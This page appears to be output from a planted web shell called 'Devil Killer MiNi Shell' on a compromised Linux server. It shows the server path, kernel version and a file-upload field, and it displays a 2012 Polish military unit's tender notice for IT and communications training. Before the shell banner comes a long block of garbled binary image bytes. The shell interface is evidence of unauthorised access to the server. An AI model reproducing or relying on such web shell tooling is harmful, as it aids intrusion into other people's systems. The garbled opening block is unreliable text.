JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121019/407784-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi szkoleniowej z zakresu łączności 
i informatyki.</b><br>
<b>Numer ogłoszenia: 407784 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1blot. sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa nr 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi szkoleniowej z zakresu łączności 
i informatyki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - ITIL v.3 Foundation zarządzanie usługami.
Zadanie nr 2 - Metodyka zarządzania projektami PRINCE 2 Foundation.
Zadanie nr 3 - Metodyka zarządzania projektami PRINCE 2 Practitioner.
Zadanie nr 4 - Wprowadzenie do technologii IPv6 lub podstawy protokołu IPv6;
Zadanie nr 5 - Systemy radiokomunikacji ruchomej lądowej.
Zadanie nr 6 - Łączność satelitarna.
Zadanie nr 7 - Anteny radiokomunikacyjne.
Zadanie nr 8:
1)	Informatyczne aspekty zarządzania bezpieczeństwem informacji zgodnie 
z PN-ISO/IEC 27001:2007 i ISO/IEC 27002:2007 /poprzednia ISO/IEC 17799:2005/
2)	 Zarządzanie ryzykiem związanym z systemami informacyjnymi.
3)	 Zarządzanie ciągłością działania.
4)	 Audytor wewnętrzny systemu zarządzania bezpieczeństwem informacji    zgodnie z PN-ISO/IEC 27001:2007.
Zadanie nr 9 - Szkolenie PMI.
Zadanie nr 10 - PYTHON Programming.

1. Metodyka szkolenia - wykład, prezentacja-pokaz, ćwiczenia i warsztaty.
2. Wykonawca musi spełniać następujące wymogi:
1)	Wykonawca przedstawi certyfikaty uprawniające do prowadzenia szkolenia lub oświadczenie o posiadanych kwalifikacjach wykładowców;
2)	Wykonawca zabezpieczy szkolonym:
- salę wykładową do przeprowadzenia szkoleń, na terenie miasta stołecznego Warszawa, która powinna zapewniać warunki i środowisko pracy;
- zestawy materiałów szkoleniowych w języku polskim dla każdego uczestnika szkolenia osobno;
3)	Wykonawca wystawi dla każdego z uczestników szkoleń imienny certyfikat ukończenia szkolenia, sygnowany przez firmę prowadzącą szkolenie;
4)	Wykonawca szkolenia musi posiadać akredytację ,certyfikację właściciela metodyki - dotyczy zadania nr 2;
5)	Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcy zobowiązany jest wskazać w ofercie jaką część zamówienia powierzy do wykonania osobom trzecim;
6)	Wykonawca przedstawi w ofercie dostępne minimum dwa terminy szkoleń dla każdego zadania. Proponowane terminy szkolenia muszą mieścić się w terminie 
do dnia 10.12.2012 r.;
7)	Proponowane terminy szkoleń należy wpisać w formularzu ofertowym;
8)	Zamawiający może skorzystać z jednego lub kilku terminów szkoleń wskazanych przez Wykonawcę w ofercie, tak aby w danym terminie uczestniczyła część osób skierowanych przez Zamawiającego na szkolenie;
9)	Wykonawca w ofercie przedstawi zakres szkolenia dla zadania, na które złożył ofertę;
10)	Wykonawca umożliwi realizację szkoleń w grupach szkoleniowych o wielkości 
do 20 osób.
3. W cenie przedmiotu zamówienia Wykonawca uwzględnia wszystkie elementy zamówienia. Cena zawiera wszystkie koszty związane z realizacją przedmiotu zamówienia, w tym:
1)	szkolenie;
2)	zapewnienie podręczników, ćwiczeń lub materiałów pomocniczych, ćwiczenia oraz kserokopie materiałów do realizacji przedmiotu zamówienia przechodzą 
na własność uczestnika szkolenia;
3)	zapewnienie niezbędnych do szkolenia pomocy szkoleniowych - planszy, 
diagramów itd.;
4)	zapewnienie kopii materiałów dodatkowych niezbędnych w czasie szkolenia 
dla szkolonych oraz dostęp do urządzeń umożliwiających kopiowanie materiałów;
5)	zabezpieczenia w materiały eksploatacyjne, papier xero, toner, markery itd.;
6)	zapewnienie sprzętu audio-video niezbędnego do zabezpieczenia szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty .
2. Certyfikaty uprawniające do prowadzenia szkolenia lub oświadczenie                         o posiadanych kwalifikacjach wykładowców.

3. Oświadczenie, że egzamin odbędzie się w certyfikowanym ośrodku a uczestnicy szkolenia otrzymają stosowne certyfikaty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1blot. sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa nr 4198, 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 50, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:00, miejsce: Jednostka Wojskowa nr 4198, 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 51, pokój 214 - Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ITIL v.3 Foundation zarządzanie usługami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 3 dni z wyłączeniem dni ustawowo wolnych od pracy (24 godziny szkoleniowe).
2.	Szkolenie zakończone - egzaminem oraz otrzymaniem przez szkolonych stosownego certyfikatu/zaświadczenia.
3.	Ilość szkolonych - 7 osób;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt oraz aktualną wersję certyfikowanego podręcznika - zabezpiecza prowadzący szkolenie.
6.	Zagadnienia szkoleniowe: 
1)	Podstawowe pojęcia z zakresu zarządzania projektem, kontekst i organizacja projektu, główne elementy modelu zarządzania usługami;
2)	Strategia usług: zarządzanie portfelem usług, zarządzanie finansowe, zarządzanie popytem;
3)	Określanie zakresu projektu, harmonogramowanie - szacowanie czasu, szacowanie kosztów projektu; 
4)	Projektowanie usług, przekazanie usług, eksploatacja usług, ustawiczne doskonalenie usług;
5)	Kompleksowy model procesów, lista ról i funkcji zdefiniowanych w bibliotece ITILR;
6)	Zbiór kluczowych pojęć i definicji;
7)	Zasady praktycznego stosowania ITILR;
8)	Pojęcie Jakość w projekcie - zarządzanie jakością, pojęcie ryzyka w projekcie - zarządzanie ryzykiem;
9)	Ludzie i komunikacja w projekcie;
10)	Realizacja projektu - koordynacja, monitorowanie, kontrolowanie, przegląd końcowy projektu - zakończenie projektu;
11)	Praktyczne ćwiczenia: definiowanie usług, pakiet projektu usługi, umowa SLA, wniosek o zmianę, eskalacja;
12)	Metody osiągania szybkich korzyści z wykorzystania praktyk ITILR..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Metodyka zarządzania projektami PRINCE 2 Foundation..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 3 dni z wyłączeniem dni ustawowo wolnych od pracy (24 godzin szkoleniowych).

2.	Szkolenie zakończone - egzaminem  w certyfikowanym ośrodku oraz otrzymaniem przez szkolonych stosownego certyfikatu.
3.	Ilość szkolonych - 15 osób;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt oraz aktualną wersję certyfikowanego podręcznika - zabezpiecza prowadzący szkolenie;
6.	Zagadnienia szkoleniowe: 
1)	Przygotowania Projektu - omówienie procesu, dzięki któremu projekt może rozpocząć się w kontrolowany sposób; 
2)	Uzasadnienie Biznesowe - jego skład, rola, sposób wykorzystania w projekcie zarządzanym zgodnie z metodyką PRINCE2R;
3)	Organizacja - jak powinna być zbudowana struktura zespołu zarządzania projektem, role w zespole oraz zakresy odpowiedzialności osób je pełniących;
4)	Zarządzanie Strategiczne Projektem - jak zbudowany jest ten proces i jak Komitet Sterujący realizuje swoje zadania;
5)	Inicjowanie Projektu - proces zaplanowania całego projektu oraz złożenia i przedstawienia Komitetowi Sterującemu Dokumentacji Inicjowania Projektu;
6)	Omówienie tematów: Jakości, Ryzyka, Planów i Zmiany w projekcie;
7)	Omówienie procesu Sterowania Etapem - jakie są zadania Kierownika Projektu, jak wygląda zarządzanie zagadnieniami oraz w jaki sposób podejmowane są działania korygujące;
8)	Zarządzanie Dostarczaniem Produktów - umożliwiające kontrolowane oddzielenie wytwarzania produktów od zarządzania projektem (mechanizmy zlecania kontroli i odbierania produktów);
9)	Postępy - ustanowienie mechanizmów monitorowania i porównywania faktycznych osiągnięć z planowanymi, dostarczania prognozy dotyczącej osiągnięcia celów projektu oraz zapewnienia ciągłej zasadności biznesowej projektu;
10)	Zamykanie Projektu - pozwalające na kontrolowane zakończenie projektu wraz z ostatecznym przekazaniem produktów projektu służbom utrzymania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Metodyka zarządzania projektami PRINCE 2 Practitioner..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 2 dni z wyłączeniem dni ustawowo wolnych od pracy 
(16  godzin szkoleniowych).
2.	Szkolenie zakończone - egzaminem w certyfikowanym ośrodku oraz otrzymaniem przez szkolonych stosownego certyfikatu;
3.	Ilość szkolonych - 14 osób;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie.
6.	Zagadnienia szkoleniowe: 
1)	Zapoznanie z podstawowymi zagadnieniami metodyki PRINCE2R - omówienie pryncypiów, tematów i procesów, zadania i mapy procesów z uwzględnieniem produktów każdego z nich;
2)	Omówienie struktury modelu procesowego PRINCE2;
3)	Zadania, produkty wejściowe i wyjściowe każdego procesu;
4)	Komponenty metodyki PRINCE2 i ścieżki ich realizacji trakcie projektu 
z uwzględnieniem skalowania;
5)	Techniki zalecane w metodyce PRINCE2 i sposoby ich wykorzystania podczas realizacji projektu oraz na różnych poziomach projektu;
6)	Omówienie przygotowania, inicjacji projektu, dokumentu inicjującego projekt, zarządzania końcem etapu, zarządzania strategicznego projektem, zamykania etapu, uzasadnienia biznesowego, jakości, ryzyka;
7)	Metodyka zarządzania projektem a metodyki wytwarzania produktów;
8)	Omówienie konstrukcji planów oraz istoty planowania opartego na produktach, zarządzania zmianami oraz monitorowania postępów prac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wprowadzenie do technologii IPv6 lub podstawy protokołu IPv6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 2 dni z wyłączeniem dni ustawowo wolnych od pracy    (16 godzin szkoleniowych);
2.	Szkolenie zakończone - otrzymaniem przez szkolonych stosownego certyfikatu/  zaświadczenia;
3.	Ilość szkolonych - 3 osoby;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie;
6.	Zagadnienia szkoleniowe: 
1)	Potrzeby nowego protokołu, wady rozwiązań IPv4, zalety IPv6: standaryzacja                                                                IPv6, projektowanie;
2)	Format pakietu IPv6, sposoby adresowania, podstawowe mechanizmy działania IPv6: nowa klasa ruchowa anycast, elementy nagłówka, fragmentacja pakietów;
3)	Ruch multicastowy w IPv6 (Multicast Listener Discovery);
4)	Obsługa i cechy protokołów dodatkowych (DHCPv6, ICMPv6): wykrywanie sąsiadów (Neighbour Discovery), Path MTU Discovery, Solicitation Stateful, Stateless auto - configuration router renumbering;
5)	Współpraca IPv4 i IPv6 - mechanizmy daul stack, tunelowanie, translacja adresów, 6to4, SIT, Teredo;
6)	Usługi IPv6: mobilność adresów IPv6;
7)	Bezpieczne połączenia VPN w IPv6 (mechanizmy IPsec, IKE);
8)	Wpływ protokołu IPv6 na architekturę TISPAN NGN i konwergencja 
w technologiach IMS czy VoIP;
9)	Wsparcie operatorskie do IPv6, MPLS, 6PE, 6VPE, znane implementacje IPv6;
10)	Dodatkowe zagadnienia związane z IPv6 i strategia migracji na rynku operatorskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Systemy radiokomunikacji ruchomej lądowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 2 dni z wyłączeniem dni ustawowo wolnych od pracy (16 godzin szkoleniowych);
2.	Szkolenie zakończone - otrzymaniem przez szkolonych stosownego certyfikatu/ zaświadczenia;
3.	Ilość szkolonych - 3 osoby;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie;
9. Zagadnienia szkoleniowe: 
1)	 Zapoznanie uczestników szkolenia z technologią radiokomunikacji ruchomej
lądowej tj.:
a)	propagacja fal radiowych, bilansu łącza radiowego, zasięgów transmisji, modeli propagacyjnych, planowania sieci radiowych, koncepcji sieci komórkowych, metod wielodostępu oraz architektura sieci;

b)	technologia radiokomunikacji ruchoma lądowa, w tym: GSM/GPRS/EDGE, UMTS, cdma2000, WiMAX, LTE, TETRA;
2)	 Ogólna charakterystyka Radiokomunikacja ruchoma lądowa (RRL):
a)	propagacja fal radiowych w RRL;
b)	bilans łącza radiowego;
c)	zasięg użytkowy / zakłóceniowy;
d)	modele propagacji fal dla potrzeb RRL;
e)	podstawy planowania sieci RRL;
f)	koncepcja sieci komórkowej;
g)	wielodostęp (FDMA, TDMA, CDMA, OFDMA);
h)	architektura sieci (model OSI, usługi sieci i aplikacje użytkowników);
i)	radiowa sieć dostępowa / sieć szkieletowa (konwergencja usług);
3)	Ogólna charakterystyka -Systemy radiokomunikacji ruchomej lądowej:
A) Cyfrowe systemy stosowane w sieciach publicznych:
 a)  GSM/GPRS/EDGE
- opis systemu, architektura sieci, interfejsy;
- usługi telekomunikacyjne, usługi dodatkowe;
- ewolucja standardu .
 b) UMTS
- specyfikacja systemu;
- opis właściwości;
- ewolucja standardu - systemy HSDPA, HSUPA, HSPA+.
 c) cdma2000 - wersje standardu, usługi
 d) WiMAX - wersje standardu, usługi
 e) LTE i LTE Advanced
- specyfikacja systemu;
- właściwości i perspektywy rozwoju.
B) Cyfrowe systemy stosowane w sieciach dyspozytorskich:
a) sieć dyspozytorska - specyficzne wymagania użytkowników;
b) sieć dyspozytorska konwencjonalna / trankingowa.
